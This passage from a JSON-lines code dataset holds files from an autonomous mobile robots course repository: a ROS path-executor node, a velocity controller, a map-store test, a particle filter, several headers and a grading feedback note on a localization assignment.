"text": "#!/usr/bin/env python\n\nPACKAGE = 'amr_navigation'\nNODE = 'path_executor'\n\nimport roslib\nroslib.load_manifest(PACKAGE)\nimport rospy\n\nfrom smach_msgs.msg import SmachContainerStatus\nfrom actionlib import SimpleActionClient, SimpleActionServer\nfrom nav_msgs.msg import Path\nfrom amr_msgs.msg import MoveToAction, MoveToGoal, ExecutePathAction, \\\n ExecutePathFeedback, ExecutePathResult\n\n\nclass PathExecutor:\n\n SLEEP_RATE = 5\n GOAL_SUCCEEDED = 3\n GOAL_ABORTED = 4 \n\n def __init__(self, move_to_topic, execute_path_topic, path_publisher_topic, wall_follower_topic, timeout):\n '''\n Initialized all needed variables and starts the client, server and publisher.\n '''\n self.goal = None\n self.waypoint_toggle = False\n self.path_index = 0\n self.waypoint_unreachable = False\n self.loop_rate = rospy.Rate(PathExecutor.SLEEP_RATE)\n self.timeout = rospy.Duration(timeout)\n self.timeout_val = timeout\n self.timer =None;\n\n self.client = SimpleActionClient(move_to_topic, MoveToAction)\n self.client.wait_for_server()\n self.publisher = rospy.Publisher(path_publisher_topic, Path)\n if not wall_follower_topic == None:\n self.wall_follower = rospy.Subscriber(wall_follower_topic, SmachContainerStatus, self.wall_follower_cb)\n self.server = SimpleActionServer(execute_path_topic, ExecutePathAction, self.execute_cb, False)\n self.server.start()\n \n rospy.loginfo(\"Path executor ready with timout : {0}\".format(self.timeout_val));\n pass\n\n def execute_cb(self, action_path):\n '''\n Is called when a new path is send to this node. Each waypoint is then \n send to a motion controller if the previous was reached or is unreachable. \n '''\n rospy.loginfo(\"Received new path\")\n self.publisher.publish(action_path.path)\n \n self.result = ExecutePathResult()\n [self.result.visited.append(0) for pose in action_path.path.poses]\n \n self.path_index = 0\n self.goal = MoveToGoal()\n self.goal.target_pose = action_path.path.poses[self.path_index] \n self.client.send_goal(self.goal, done_cb=self.move_to_done_cb)\n \n while not rospy.is_shutdown():\n \n # Checks if preemption was requested and if yes, than preempts the path executor.\n if self.server.is_preempt_requested():\n self.server.set_preempted(self.result)\n rospy.logwarn(\"Preempted path execution\")\n break\n \n # Waypoint_toggle is set by move_to_done_cb and signalizes that a waypoint was reached or is unreachable.\n if self.waypoint_toggle:\n self.waypoint_toggle = False\n self.path_index += 1\n \n # If waypoint is unreachable and it's not allowed to skip a waypoint, path executor aborts.\n if self.waypoint_unreachable and not action_path.skip_unreachable:\n self.server.set_aborted(self.result)\n rospy.logwarn(\"Aborted path execution\")\n break\n pass\n \n # Send the next waypoint to a motion controller. If there is no next waypoint, path executor succeeded.\n if self.path_index < len(action_path.path.poses):\n self.goal = MoveToGoal()\n self.goal.target_pose = action_path.path.poses[self.path_index]\n self.client.send_goal(self.goal, done_cb=self.move_to_done_cb)\n else:\n self.server.set_succeeded(self.result)\n rospy.logwarn(\"Succeeded path execution\")\n break\n \n self.loop_rate.sleep()\n pass\n \n def move_to_done_cb(self, state, result):\n '''\n Is called when a waypoint is reached. 
Toggles a waypoint_toggle to\n signal the execute_cb to send the next waypoint to a motion controller.\n '''\n feedback = ExecutePathFeedback()\n feedback.pose = self.goal.target_pose\n \n # Evaluates the state\n if state == PathExecutor.GOAL_SUCCEEDED:\n rospy.loginfo(\"Waypoint [%.2f, %.2f] reached\", self.goal.target_pose.pose.position.x, self.goal.target_pose.pose.position.y)\n feedback.reached = True\n elif state == PathExecutor.GOAL_ABORTED:\n rospy.loginfo(\"Waypoint [%.2f, %.2f] unreachable\", self.goal.target_pose.pose.position.x, self.goal.target_pose.pose.position.y)\n feedback.reached = False\n self.waypoint_unreachable = True\n \n self.result.visited[self.path_index] = feedback.reached\n self.server.publish_feedback(feedback)\n self.waypoint_toggle = True\n pass\n def wall_follower_cb(self, data):\n self.wallfollower_current_state = data.active_states[0]\n if(self.wallfollower_current_state == 'FOLLOW_WALL'):\n if self.is_timeout_available():\n self.timer = rospy.Timer(self.timeout, self.timer_cb, oneshot=True);\n elif(self.wallfollower_current_state == 'None'):\n if not(self.timer == None):\n self.timer.shutdown();\n pass\n\n def is_timeout_available(self):\n return not(self.timeout_val == 0)\n pass\n def timer_cb(self,event):\n rospy.logwarn(\"goal preempted due to timeout\")\n if(self.wallfollower_current_state == 'FOLLOW_WALL'):\n self.waypoint_toggle = True\n self.waypoint_unreachable = True\n if not(self.timer == None):\n self.timer.shutdown();\n\nif __name__ == '__main__':\n rospy.init_node(NODE)\n move_to_topic = '/motion_controller/move_to'\n execute_path_topic = '/path_executor/execute_path'\n path_publisher_topic = '/path_executor/current_path'\n obstacle_avoidance_timeout = 0;\n wall_follower_topic = None\n if rospy.get_param('~use_obstacle_avoidance', True):\n move_to_topic = '/bug2/move_to'\n wall_follower_topic = '/smach_inspector/smach/container_status'\n if rospy.has_param('~obstacle_avoidance_timeout'):\n obstacle_avoidance_timeout = rospy.get_param('~obstacle_avoidance_timeout')\n \n pe = PathExecutor(move_to_topic, execute_path_topic, path_publisher_topic, wall_follower_topic, obstacle_avoidance_timeout)\n rospy.spin()\n pass"
},
{
"alpha_fraction": 0.7055476307868958,
"alphanum_fraction": 0.7439544796943665,
"avg_line_length": 36,
"blob_id": "4b97c8bf73979c5dcdb8996f0b848fb1fbd38d85",
"content_id": "7d1c9d7edef7c0a8b07f106e74f39014a914b2f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 703,
"license_type": "no_license",
"max_line_length": 291,
"num_lines": 19,
"path": "/grades/20140607.md",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "Grade\n=====\n\n* Comments: 1/1 \n* Motion model: 1.5/1.5\n* New particle generation: 0.5/0.5\n* Resampling: 0.5/1.5\n* Low overall weight firewall: 0.5/0.5\n* Increased robustness by adding random particles: 0/0.5\n* Best pose estimate: 0.5/0.5\n\n_Total:_ 4.5 points\n\nFeedback\n========\n\nYour implementation of a low overall weight firewall is to kill all particles with low weight. This is generally a good idea, but instead you could have just added a number of random particles every round, as was advised. This way you would increase the robustness of your approach by a lot.\n\nYou resampling step is erroneous, as you do not start the roulette wheel with a random number, which is the basis for the approach.\n"
},
{
"alpha_fraction": 0.667271077632904,
"alphanum_fraction": 0.6731640696525574,
"avg_line_length": 31.91044807434082,
"blob_id": "b289f2f63303749f5222fe41fdf650f2b27b3a19",
"content_id": "79bf3e70050756e7851c2e32828c12a1d1699bd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2206,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 67,
"path": "/amr_navigation/src/diff_velocity_controller.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#include \"diff_velocity_controller.h\"\n\nDiffVelocityController::DiffVelocityController(double l_max_vel, double l_tolerance,\n double a_max_vel, double a_tolerance)\n: l_max_vel_(l_max_vel)\n, l_tolerance_(l_tolerance)\n, a_max_vel_(a_max_vel)\n, a_tolerance_(a_tolerance)\n{\n}\n\nvoid DiffVelocityController::setTargetPose(const Pose& pose)\n{\n target_pose_ = pose;\n linear_complete_ = false;\n angular_complete_ = false;\n}\n\nbool DiffVelocityController::isTargetReached() const\n{\n return linear_complete_ & angular_complete_;\n}\n\nVelocity DiffVelocityController::computeVelocity(const Pose& actual_pose)\n{\n // Displacement and orientation to the target in world frame\n double dx = target_pose_.x - actual_pose.x;\n double dy = target_pose_.y - actual_pose.y;\n\n // Step 1: compute remaining distances\n double linear_dist = getDistance(target_pose_, actual_pose);\n double angular_dist = getShortestAngle(target_pose_.theta, actual_pose.theta);\n\n if (std::abs(linear_dist) < l_tolerance_ && std::abs(angular_dist) < a_tolerance_)\n {\n linear_complete_ = true;\n angular_complete_ = true;\n return Velocity();\n }\n\n if (std::abs(linear_dist) > l_tolerance_)\n // We still need to drive to the target, therefore we first need to make\n // sure that we are oriented towards it.\n angular_dist = getShortestAngle(atan2(dy, dx), actual_pose.theta);\n\n // Step 2: compute velocities\n double linear_vel = 0.0;\n double angular_vel = 0.0;\n\n if (std::abs(linear_dist) > l_tolerance_)\n linear_vel = std::abs(linear_dist) > 5 * l_tolerance_ ? l_max_vel_ : l_tolerance_;\n\n if (std::abs(angular_dist) > a_tolerance_)\n angular_vel = std::abs(angular_dist) > 5 * a_tolerance_ ? a_max_vel_ : a_tolerance_;\n\n if (std::abs(angular_dist) > a_tolerance_ * 5)\n {\n // We need to rotate a lot, so stand still and rotate with max velocity.\n return Velocity(0, 0, std::copysign(angular_vel, angular_dist));\n }\n else\n {\n // We need to rotate just a bit (or do not need at all), so it is fine to\n // combine with linear motion if needed.\n return Velocity(std::copysign(linear_vel, linear_dist), 0, std::copysign(angular_vel, angular_dist));\n }\n}\n\n"
},
{
"alpha_fraction": 0.49086716771125793,
"alphanum_fraction": 0.5169356465339661,
"avg_line_length": 24.51131248474121,
"blob_id": "724458eccb03ef15752ea04c282157b2973b855f",
"content_id": "8edc1ccb1eed466cee0a4f5ddfff4a48c3245652",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11279,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 442,
"path": "/amr_mapping/src/map_store_test.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "WINDOWS-1252",
"text": "\n// list here *ALL* header files include from map-store.h\n#include <exception>\n#include <list>\n\n// allow us access to internals of map-store classes\n#define private protected\n#include \"map-store.h\"\n#include \"map-store-cone.h\"\n\n// process other includes normally\n#undef private\n\n#include <iostream>\n#include <math.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <string.h>\n\nusing namespace MobileRobots;\n\nstruct FailInfo {\n FailInfo(int chk, int expected, const char *item) : found(chk), required(expected), info(0) {\n if (item)\n info = strdup(item);\n }\n\n FailInfo(const FailInfo &old) : found(old.found), required(old.required), info(0) {\n if (old.info)\n info = strdup(old.info);\n }\n\n ~FailInfo() {\n if (info)\n free(info);\n }\n\n int found;\n int required;\n char *info;\n\nprivate:\n FailInfo &operator=(const FailInfo &old);\n};\n\nstruct TestLine {\n TestLine(double xs, double ys, double xe, double ye) : startX(xs), startY(ys), endX(xe), endY(ye) {\n dx = xe-xs;\n dy = ye-ys;\n len = sqrt( dx*dx + dy*dy );\n dxnorm = dx/len;\n dynorm = dy/len;\n\n }\n\n double pointDist(double tx, double ty) {\n double tdx = tx - startX;\n double tdy = ty - startY;\n\n double project = vScal(tdx, tdy);\n /*\n fx = startX + dxnorm*project;\n fy = startY + dynorm*project;\n\n distx = tx - fx; // = tdx + startX - fx\n disty = ty - fy; // = tdy + startY - fy\n\n distx = tdx - dxnorm*project;\n disty = tdy - dynorm*project;\n */\n\n tdx -= dxnorm*project;\n tdy -= dynorm*project;\n\n return sqrt(tdx*tdx + tdy*tdy);\n }\n\n double pointProjection(double tx, double ty) {\n double tdx = tx - startX;\n double tdy = ty - startY;\n\n return vScal(tdx, tdy);\n }\n\n double vScal(double tx, double ty) {\n return (tx*dxnorm + ty*dynorm);\n }\n\n double vScal(double x1, double y1, double x2, double y2) {\n return (x1*x2 + y1*y2);\n }\n\n double startX, startY, endX, endY;\n double dx,dy,len;\n\n double dxnorm, dynorm;\n};\n\nusing std::cout;\nusing std::endl;\n\nclass MapStoreTest : public MapStore {\npublic:\n MapStoreTest() : MapStore(10,10), okCnt(0), failCnt(0) {\n\n // checking sizes\n cout << \"Checking map sizes ...\" << endl;\n checkVal(minX(), -5, \"minX\");\n checkVal(maxX(), 5, \"maxX\");\n checkVal(minY(), -5, \"minY\");\n checkVal(maxY(), 5, \"maxY\");\n\n cout << \"Checking limit tests ...\" << endl;\n int x;\n for (x = -7; x < 7; x++) {\n if (x < -5) {\n\t// outside\n\tif (isInX(x))\n\t reportFail(x, \"false expected, but true found\", \"isInX\");\n } else if (x > 5) {\n\t// outside\n\tif (isInX(x))\n\t reportFail(x, \"false expected, but true found\", \"isInX\");\n } else {\n\t// inside\n\tif (!isInX(x))\n\t reportFail(x, \"true expected, but false found\", \"isInX\");\n }\n }\n\n /*\n for(x = -7; x < 7; x++) {\n for(dx = 1; dx < 5; dx++) {\n\tint xt = t;\n\tint dxt = dx;\n\tconvXRange(xt, dxt);\n\tif (x < -5) {\n\t // outside\n\t if (isInX(x))\n\t reportFail(x, \"false expected, but true found\", \"isInX\");\n\t} else if (x > 5) {\n\t // outside\n\t if (isInX(x))\n\t reportFail(x, \"false expected, but true found\", \"isInX\");\n\t} else {\n\t // inside\n\t if (!isInX(x))\n\t reportFail(x, \"true expected, but false found\", \"isInX\");\n\t}\n }\n }\n */\n\n cout << \"Checkking fillRect() ...\" << endl;\n fillRect(-2,-2,5,6, 1.5);\n\n cout << \"Checking trace() ...\" << endl;\n int xs = -4;\n int ys = -4;\n int xe = -4;\n int ye = -4;\n FILE *fh = fopen(\"beamdata.txt\", \"w\");\n for (xe = -3; xe < 5; xe++) {\n fprintf(fh, \"\\n\\n\");\n checkBeam(xs, ys, xe, 
ye, -2, -2, -2+5-1, -2+6-1, 1.5, fh);\n fprintf(fh, \"e\\n\");\n }\n xe = 4;\n for (ye = -3; ye < 5; ye++) {\n fprintf(fh, \"\\n\\n\");\n checkBeam(xs, ys, xe, ye, -2, -2, -2+5-1, -2+6-1, 1.5, fh);\n fprintf(fh, \"e\\n\");\n }\n ye = 4;\n for (xe = 3; xe > -4; xe--) {\n fprintf(fh, \"\\n\\n\");\n checkBeam(xs, ys, xe, ye, -2, -2, -2+5-1, -2+6-1, 1.5, fh);\n fprintf(fh, \"e\\n\");\n }\n xe = -4;\n for (ye = 3; ye > -4; ye--) {\n fprintf(fh, \"\\n\\n\");\n checkBeam(xs, ys, xe, ye, -2, -2, -2+5-1, -2+6-1, 1.5, fh);\n fprintf(fh, \"e\\n\");\n }\n fclose(fh);\n }\n\n ~MapStoreTest() {\n cout << \"Done\" << endl;\n }\n\n bool checkBeam(int startX, int startY, int endX, int endY, int filledSX, int filledSY, int filledEX, int filledEY, double filledVal, FILE *fh) {\n cout << \"Checking beam (\" << startX << \", \" << startY << \") --> (\" << endX << \", \" << endY << \") ... \";\n double dx = endX-startX;\n double dy = endY-startY;\n double dir = atan2(dy, dx);\n double len = sqrt( dx*dx + dy*dy );\n MapStoreTrace tr = trace(startX,startY, dir, len);\n MapStoreTrace::MapIt iter = tr.traceStart();\n\n TestLine myLine(startX, startY, endX, endY);\n\n bool res = true;\n const double sqrt2 = sqrt(2);\n MapStoreCell cell;\n int idx = 0;\n while (iter != tr.traceEnd()) {\n cell = *iter;\n iter++;\n double dist = myLine.pointDist(cell.x, cell.y);\n double linePart = myLine.pointProjection(cell.x, cell.y);\n // cout << \" # \" << idx << \": (\" << (startX+linePart*cos(dir)) << \", \" << (startY+linePart*sin(dir)) << \") <-> (\" << cell.x << \", \" << cell.y << \")\" << endl;\n if (fh != 0)\n\tfprintf(fh, \"%d %.3f %.3f %d %d\\n\", idx, startX+linePart*cos(dir), startY+linePart*sin(dir), cell.x, cell.y);\n if (dist > sqrt2) {\n\tif (res)\n\t cout << endl;\n\tcout << \"point \" << cell.x << \" \" << cell.y << \" not on line: dist = \" << dist << endl;\n\tres = false;\n }\n if ( (filledSX <= cell.x) && (cell.x <= filledEX) &&\n\t (filledSY <= cell.y) && (cell.y <= filledEY) ) {\n\t// inside filled region\n\tif (cell.val != filledVal) {\n\t cout << \"Cell (\" << cell.x << \", \" << cell.y << \") value \" << cell.val << \", expected \" << filledVal << endl;\n\t res = false;\n\t}\n } else {\n\t// outside filled region\n\tif (cell.val != 0) {\n\t cout << \"Cell (\" << cell.x << \", \" << cell.y << \") value \" << cell.val << \", expected 0\" << endl;\n\t res = false;\n\t}\n }\n\n idx += 1;\n }\n if (cell.x != endX || cell.y != endY) {\n cout << \"Endpoint \" << endX << \" \" << endY << \" not reached, last point is \" << cell.x << \" \" << cell.y << endl;\n res = false;\n }\n if (res)\n cout << \"OK\" << endl;\n return res;\n }\n\n void reportFail(int arg, const char *explain, const char *item) {\n cout << item << \": arg \" << arg << \", result: \" << explain << endl;\n failCnt += 1;\n }\n\n bool checkVal(int chk, int expected, const char *item) {\n cout << item << \": req \" << expected << \", is \" << chk;\n if (chk == expected) {\n cout << \" : OK\" << endl;\n okCnt += 1;\n return true;\n } else {\n cout << \" : FAIL\" << endl;\n failCnt += 1;\n failureList.push_back(FailInfo(chk, expected, item));\n return false;\n }\n }\n\n bool growTest(void) {\n cout << \"Checking map grow() ...\" << endl;\n\n // first fill the map with data, to check if the content is not mixed\n int x1,y1;\n for (x1 = -5; x1 < 6; x1++) {\n for (y1 = -5; y1 < 6; y1++) {\n\tset(x1, y1, x1 + 6 + (y1 + 6) * 30);\n }\n }\n \n // should gow from -5..5 / -5..5 to -6..10 / -5..11\n grow(2, 3, 8);\n checkVal(minX(), -6, \"minX\");\n 
checkVal(maxX(), 10, \"maxX\");\n checkVal(minY(), -5, \"minY\");\n checkVal(maxY(), 11, \"maxY\");\n\n cout << \" checking range tests after grow() ...\" << endl;\n\n bool testVal = false;\n bool bomb = false;\n for (x1 = -7; x1 < 12; x1++) {\n for (y1 = -7; y1 < 13; y1++) {\n\ttestVal = false;\n\tif ( (-5 <= x1) && (x1 <= 5) ) {\n\t if ( (-5 <= y1) && (y1 <= 5) ) {\n\t // within original area\n\t testVal = true;\n\t }\n\t}\n\tbomb = true;\n\tif ( (-6 <= x1) && (x1 <= 10) ) {\n\t if ( (-5 <= y1) && (y1 <= 11) ) {\n\t // within original area\n\t bomb = false;\n\t }\n\t}\n\ttry {\n\t double val = get(x1, y1);\n\t if (bomb) {\n\t cout << \" error: expected 'Range' exception, but nothing happened: (\" << x1 << \", \" << y1 << \")\" << endl;\n\t }\n\t char checkbuf[30];\n\t snprintf(checkbuf, 29, \" cell (%d, %d) \", x1, y1);\n\t if (testVal) {\n\t checkVal(val, x1 + 6 + (y1 + 6) * 30, checkbuf);\n\t }\n\t /*\n\t // new values are not initialized, so nothing to test here.\n\t else {\n\t checkVal(val, 0, checkbuf);\n\t }\n\t */\n\t} catch (MapStoreError er) {\n\t if (bomb) {\n\t if (er.getType() == MapStoreError::Range)\n\t cout << \" OK received expected exception\" << endl;\n\t else\n\t cout << \" error received exception as expected, but of wrong type '\" << er.what() << \"'\" << endl;\n\t } else {\n\t cout << \" error: unexpected '\" << er.what() << \"' exception: (\" << x1 << \", \" << y1 << \")\" << endl;\n\t }\n\t}\n }\n }\n return (failCnt == 0);\n }\n\n void loadTest(void) {\n if (loadMap(\"maploadfile.txt\")) {\n cout << \"loaded map successfully. New map size: \" << sizeX << \", \" << sizeY << endl;\n cout << \"New origin: \" << originX << \", \" << originY << endl;\n } else {\n cout << \"Failed to load map\" << endl;\n }\n }\n \nprivate:\n int okCnt;\n int failCnt;\n std::list<FailInfo> failureList;\n};\n\nint main(int argc, char *argv[]) {\n\n MapStoreTest myTest;\n\n double dir;\n for (dir = 0; dir <= 90; dir += 15) {\n cout << \"Checking cone \" << dir << \"° ...\" << endl;\n cout << \" preparing ...\" << endl;\n myTest.eraseRect(-5,-5, 11,11);\n /*\n cout << \" running fillCone ...\" << endl;\n myTest.fillCone(-4,-4, dir/180.0*M_PI, 30.0/180.0*M_PI, 8, 3);\n */\n int x,y;\n double val;\n\n cout << \" creating cone iterator ...\" << endl;\n MapStoreCone myCone(-4,-4, dir/180.0*M_PI, 30.0/180.0*M_PI, 8);\n {\n MapStoreBeam beamInfoCenter(-4.0,-4.0, dir/180.0*M_PI, 8.0);\n MapStoreBeam beamInfoLeft(-4.0,-4.0, dir/180.0*M_PI + 30.0/180.0*M_PI/2, 8.0);\n MapStoreBeam beamInfoRight(-4.0,-4.0, dir/180.0*M_PI - 30.0/180.0*M_PI/2, 8.0);\n beamInfoCenter.getInitCell(x,y);\n do {\n\tif (!myTest.isInX(x))\n\t continue;\n\tif (!myTest.isInY(y))\n\t continue;\n\tmyTest.set(x,y, 4);\n } while(beamInfoCenter.nextCell(x,y));\n\n beamInfoLeft.getInitCell(x,y);\n do {\n\tif (!myTest.isInX(x))\n\t continue;\n\tif (!myTest.isInY(y))\n\t continue;\n\tmyTest.set(x,y, 4);\n } while(beamInfoLeft.nextCell(x,y));\n\n beamInfoRight.getInitCell(x,y);\n do {\n\tif (!myTest.isInX(x))\n\t continue;\n\tif (!myTest.isInY(y))\n\t continue;\n\tmyTest.set(x,y, 4);\n } while(beamInfoRight.nextCell(x,y));\n }\n\n cout << \" running cone iterator ...\" << endl;\n while(myCone.nextCell(x,y)) {\n if (!myTest.isInX(x))\n\tcontinue;\n if (!myTest.isInY(y))\n\tcontinue;\n val = myTest.get(x,y);\n if (val != 3) {\n\t//\tcout << \"Read cone cell (\" << x << \", \" << y << \"): wrong value \" << val << endl;\n }\n if (val == 0)\n\tmyTest.set(x,y,1);\n }\n\n cout << endl;\n for(y=-5; y < 6; y++) {\n for(x=-5; x < 6; x++) 
{\n\tval = myTest.get(x,y);\n\tif (val == 3) {\n\t //\t cout << \"Read non-cone cell (\" << x << \", \" << y << \"): wrong value \" << val << endl;\n\t cout << \" #\";\n\t} else if (val == 1) {\n\t cout << \" +\";\n\t} else if (val == 4) {\n\t cout << \" *\";\n\t} else {\n\t cout << \" .\";\n\t}\n }\n cout << endl;\n }\n }\n\n myTest.growTest();\n \n myTest.loadTest();\n \n // save it again\n FILE *savefile = fopen(\"mapsavefile.plot\", \"w\");\n myTest.dumpGP(savefile, \"dump of loaded map\");\n\n return 0;\n}\n\n"
},
{
"alpha_fraction": 0.6558420658111572,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 28.60377311706543,
"blob_id": "c76899c2d8bc6f0a96cb85f691f55563bccd6942",
"content_id": "5fe7459215b330bc26c57f2086e452e811a99c13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3141,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 106,
"path": "/amr_localization/src/particle_filter.cpp",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#define _USE_MATH_DEFINES\n#include <cmath>\n#include <random>\n\n#include <ros/console.h>\n\n#include \"particle_filter.h\"\n\nParticleFilter::ParticleFilter(double map_min_x, double map_max_x, double map_min_y, double map_max_y, ComputeParticleWeightCallback callback)\n: callback_(callback)\n, motion_model_(0.02, 0.01)\n, random_particle_generator_(map_min_x, map_max_x, map_min_y, map_max_y)\n, particle_set_size_(100)\n, motion_guesses_(1)\n, is_initialized(false)\n{\n}\n\nvoid ParticleFilter::update(double x, double y, double yaw)// desired motion\n{\n Particle particle;\n Pose best_pose;\n double best_weight = 0.0;\n double weight_sum = 0.0;\n ParticleVector particles_new;\n ParticleVector::iterator particles_new_iterator;\n particles_new_iterator = particles_new.begin();\n\n double resample_pos = 0.0;\n double resample_step = 0.0;\n double weight_pos = 0.0;\n int particle_index = 0;\n ParticleVector particles_resampled;\n particles_resampled.resize(particle_set_size_);\n\n int new_samples;\n int sample_to_replace;\n\n motion_model_.setMotion(x, y, yaw);\n\n // Create initial particle set\n if (!is_initialized)\n {\n is_initialized = true;\n particles_.resize(particle_set_size_);\n for (int i = 0; i < particle_set_size_; i++)\n {\n particles_.at(i) = random_particle_generator_.generateParticle();\n }\n }\n\n // Create new particles and calculates their weight\n for (int index_particle = 0; index_particle < particle_set_size_; index_particle++)\n {\n for (int index_motion = 0; index_motion < motion_guesses_; index_motion++)\n {\n // Create new particles based on motion and save them\n particle.pose = motion_model_.sample(particles_.at(index_particle).pose);\n particle.weight = callback_(particle);\n particles_new_iterator = particles_new.insert(particles_new_iterator, particle);\n\n // Save the weight sum for resampling\n weight_sum = weight_sum + particle.weight;\n\n // Set best pose based on the weight\n if (particle.weight > best_weight)\n {\n best_weight = particle.weight;\n best_pose = particle.pose;\n }\n }\n }\n\n // Resampling\n resample_step = weight_sum / particle_set_size_;\n for (int i = 0; i < particle_set_size_; i++)\n {\n while (resample_pos > (weight_pos + particles_new.at(particle_index).weight))\n {\n weight_pos = weight_pos + particles_new.at(particle_index).weight;\n particle_index++;\n }\n particles_resampled.at(i) = particles_new.at(particle_index);\n resample_pos = resample_pos + resample_step;\n }\n\n // Filtering bad samples out and create new ones\n for (int i = 0; i < particle_set_size_; i++)\n {\n if (particles_resampled.at(i).weight < 0.5)\n {\n particles_resampled.at(i) = random_particle_generator_.generateParticle();\n }\n }\n\n // Replace 25% of the samples\n// new_samples = lround(particle_set_size_ * 0.25);\n// for (int i = 0; i < new_samples; i++)\n// {\n// sample_to_replace = rand() % particle_set_size_;\n// particles_resampled.at(sample_to_replace) = random_particle_generator_.generateParticle();\n// }\n\n pose_estimate_ = best_pose;\n particles_ = particles_resampled;\n}\n\n\n\n"
},
{
"alpha_fraction": 0.7224168181419373,
"alphanum_fraction": 0.7232924699783325,
"avg_line_length": 24.93181800842285,
"blob_id": "af9025237aaa968dfb3b37ae10163132061842ee",
"content_id": "26bdc0f8280e8853179e91c162aaf877c408a3d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1142,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 44,
"path": "/amr_navigation/include/diff_velocity_controller.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef DIFF_VELOCITY_CONTROLLER_H\n#define DIFF_VELOCITY_CONTROLLER_H\n\n#include \"velocity_controller.h\"\n\n/** A simple implementation of velocity controller that drives the robot as if\n * it had a differential drive base.\n *\n * The base is assumed to have 2 degrees of freedom, i.e. can mave forwards\n * and rotate. The controller tries to orient the robot towards the goal and\n * then move it forwards until it is reached.\n *\n * The robot drives at a constant (max) velocity until it has almost reached\n * the goal pose, then it switches to the minimum velocity. */\nclass DiffVelocityController : public VelocityController\n{\n\npublic:\n\n DiffVelocityController(double l_max_vel, double l_tolerance,\n double a_max_vel, double a_tolerance);\n\n virtual void setTargetPose(const Pose& pose);\n\n virtual bool isTargetReached() const;\n\n virtual Velocity computeVelocity(const Pose& actual_pose);\n\nprivate:\n\n Pose target_pose_;\n\n bool linear_complete_;\n bool angular_complete_;\n\n double l_max_vel_;\n double l_tolerance_;\n\n double a_max_vel_;\n double a_tolerance_;\n\n};\n\n#endif /* DIFF_VELOCITY_CONTROLLER_H */\n\n"
},
{
"alpha_fraction": 0.6680107712745667,
"alphanum_fraction": 0.676075279712677,
"avg_line_length": 27.596153259277344,
"blob_id": "8ad7ed9bc642912eff348e9d728a2dc4d3fb0be1",
"content_id": "26d6e033f36feeb8cdb4dc1448f09eee4e19c76e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1488,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 52,
"path": "/amr_braitenberg/include/braitenberg_vehicle.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef BRAITENBERG_VEHICLE_H\n#define BRAITENBERG_VEHICLE_H\n\n#include <memory>\n\nclass BraitenbergVehicle\n{\n\npublic:\n\n typedef std::unique_ptr<BraitenbergVehicle> UPtr;\n\n /** Braitenberg vehicle type. */\n enum Type\n {\n TYPE_A, ///< direct connections\n TYPE_B, ///< cross connections\n TYPE_C, ///< direct and cross connections\n };\n\n /** Default constructor creates a vehicle of type A with the connection\n * factor equal to 1. */\n BraitenbergVehicle();\n\n /** Construct a braitenberg vehicle of the desired type.\n *\n * @a factor2 has an effect only for vehicles of type C, therefore this\n * parameter may be omitted when constructing vehicles of other types. */\n BraitenbergVehicle(Type type, float factor1, float factor2 = 0.0);\n\n ~BraitenbergVehicle() { };\n\n /** Compute wheel speeds of the vehicle depending on the input from sonars.\n *\n * @param left_in : left sonar reading scaled by its maximum range, i.e.\n * proximity to an obstacle (in interval [0..1]), where 0 means\n * contact, and 1 means that there are no obstacles in the sonar\n * range.\n * @param right_in : same as @a left_in, but for the right sonar.\n * @param left_out : computed left wheel speed.\n * @param right_out : computed right wheel speed. */\n void computeWheelSpeeds(float left_in, float right_in, float& left_out, float& right_out);\n\nprivate:\n\n Type type_;\n float factor1_;\n float factor2_;\n\n};\n\n#endif /* BRAITENBERG_VEHICLE_H */\n\n"
},
{
"alpha_fraction": 0.7148726582527161,
"alphanum_fraction": 0.7156943082809448,
"avg_line_length": 28.658536911010742,
"blob_id": "5688b3289762d15d666f8d7987060d02e9eb26ab",
"content_id": "7542d185a6921d5297f1fdffeca757aa722b0e10",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1217,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 41,
"path": "/amr_localization/include/particle.h",
"repo_name": "shehzi001/amr-ss",
"src_encoding": "UTF-8",
"text": "#ifndef PARTICLE_H\n#define PARTICLE_H\n\n#include <vector>\n\n#include \"pose.h\"\n\n/** Representation of a weighted particle for the particle filter.\n *\n * This structure represents a particle of the particle filter, composed of the\n * robot's assumed pose and the weight assigned to this pose based on\n * observation match. */\nstruct Particle\n{\n /** Robot pose proposed by this particle. */\n Pose pose;\n\n /** Importance of this particle after observation update.\n *\n * Measured as match between real observation and simulated observation from\n * this particle's pose. This should be a positive value between 0 and some\n * limit @c max_weight, such that a value close to zero indicate bad match\n * with real observation and a value close to @c max_weight indicates almost\n * perfect match. */\n double weight;\n\n /** Particle comparison operator (based on weight).\n *\n * Implementing this operator allows to use standard library algorithms to\n * find minimum and maximum elements in a vector of Particles, or sort it. */\n bool operator<(const Particle& rhs) const\n {\n return this->weight < rhs.weight;\n }\n\n};\n\ntypedef std::vector<Particle> ParticleVector;\n\n\n#endif /* PARTICLE_H */\n\n"
},
{
"alpha_fraction": 0.6543624401092529,
"alphanum_fraction": 0.7063758373260498,
"avg_line_length": 26.136363983154297,
"blob_id": "3a824239831242dbfdaa12bf5d3ce7a265278139",
